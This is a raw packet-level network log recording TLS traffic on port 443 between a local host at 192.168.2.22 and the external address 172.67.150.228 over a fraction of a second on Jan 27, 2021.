Jan 27, 2021 04:10:09.581794977 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.581818104 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.581831932 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.581861019 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.581864119 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.581907988 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.582709074 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.582748890 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.582765102 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.582792044 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.582813978 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.582825899 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.582828999 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.582875013 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.583458900 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.583638906 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.583678007 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.583692074 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.583715916 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.583724022 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.583753109 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.583760977 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.583796978 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.584538937 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.584578037 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.584599018 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.584614992 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.584620953 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.584655046 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.584666967 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.584705114 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.587033987 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.595643044 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.595669031 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.595719099 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.595890045 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.596755028 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.596791029 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.596807957 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.596821070 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.596833944 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.596841097 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.596859932 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.596874952 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.597419024 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.597446918 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.597474098 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.597476959 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.597487926 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.597502947 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.597513914 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.597548962 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.598051071 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.598079920 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.598103046 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.598114014 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.598114014 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.598145962 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.598155975 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.598186970 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.598936081 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.598973989 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.599004030 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.599004984 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.599014997 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.599033117 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.599045992 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.599076986 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.599886894 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.599915981 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.599942923 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.599944115 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.599958897 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.599967957 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.599983931 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.600009918 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.600295067 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.600684881 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.600713968 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.600735903 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.600747108 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.600750923 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.600779057 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.600800991 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.600819111 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.601666927 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.601696014 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.601720095 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.601723909 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.601735115 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.601751089 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.601763964 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.601789951 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.602555037 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.602585077 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.602611065 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.602612972 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.602622986 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.602655888 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.602660894 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.602696896 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.602899075 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.603499889 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.603533030 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.603559971 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.603559971 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.603578091 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.603588104 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.603596926 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.603626013 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.604376078 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.604432106 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.630940914 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.631000996 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.631032944 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.631117105 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.631510973 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.632565975 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.632596970 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.632643938 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.632669926 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.632850885 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.632893085 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.632924080 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.632929087 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.632941961 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.632966995 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.632982016 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.633003950 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.633011103 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.633040905 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.633054972 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.633086920 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.633086920 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.633137941 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.633533001 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.633570910 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.633589983 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.633609056 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.633615971 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.633646011 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.633651018 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.633682013 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.633692980 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.633712053 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.633728981 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.633754015 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.634273052 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.634322882 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.634336948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.634365082 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.634383917 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.634402037 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.634416103 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.634439945 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.634464979 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.634475946 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.634491920 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.634515047 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.634541035 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.634579897 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.635191917 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.635241032 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.635261059 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.635282993 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.635283947 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.635320902 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.635339022 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.635359049 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.635361910 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.635396004 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.635420084 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.635432005 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.635436058 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.635489941 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.636131048 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.636178970 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.636193037 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.636220932 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.636240959 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.636257887 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.636274099 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.636296988 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.636331081 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.636333942 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.636349916 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.636370897 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.636395931 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.636420012 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.637073994 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.637114048 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.637139082 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.637151003 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.637156963 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.637187958 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.637204885 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.637228966 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.637234926 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.637275934 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.637293100 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.637310982 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.637326002 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.637375116 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.638009071 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.638050079 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.638078928 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.638086081 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.638098955 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.638123989 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.638150930 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.638161898 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.638163090 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.638209105 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.638223886 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.638251066 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.638267040 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.638309002 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.638957977 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.638998985 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.639024973 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.639034986 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.639045954 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.639074087 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.639094114 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.639110088 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.639130116 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.639154911 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.639158964 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.639200926 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.639216900 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.639269114 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.640011072 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.640069962 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.640085936 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.640106916 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.640131950 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.640146017 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.640146971 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.640198946 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.640203953 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.640256882 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.640258074 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.640314102 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.640314102 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.640369892 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.640877962 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.640938044 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.640945911 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.640985012 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.641032934 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.641036034 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.641041994 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.641088009 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.641096115 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.641136885 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.641145945 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.641186953 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.641196966 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.641242981 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.641848087 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.641915083 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.641969919 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.641973019 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.641993999 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.642020941 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.642025948 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.642077923 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.642081976 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.642126083 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.642138004 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.642175913 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.642189026 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.642230988 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.642797947 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.642860889 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.642864943 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.642915010 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.642925978 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.642966032 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.642980099 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.643014908 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.643018961 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.643064976 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.643084049 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.643117905 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.643125057 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.643173933 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.643732071 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.643800020 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.643800974 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.643862009 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.643866062 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.643919945 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.643922091 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.643980026 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.643980980 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.644035101 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.644037008 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.644090891 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.644520998 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.644577980 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.644587040 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.644634008 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.644639969 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.644692898 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.644695997 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.644756079 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.644758940 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.644810915 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.644814968 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.644870043 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.644871950 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.644937038 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.645464897 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.645515919 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.645534039 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.645558119 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.645581961 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.645602942 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.645616055 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.645641088 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.645664930 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.645677090 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.645679951 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.645723104 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.645735979 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.645778894 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.646451950 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.646501064 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.646528006 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.646537066 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.646573067 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.646579981 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.646605015 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.646614075 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.646641016 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.646648884 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.646671057 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.646686077 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.646698952 CET	49165	443	192.168.2.22	172.67.150.228
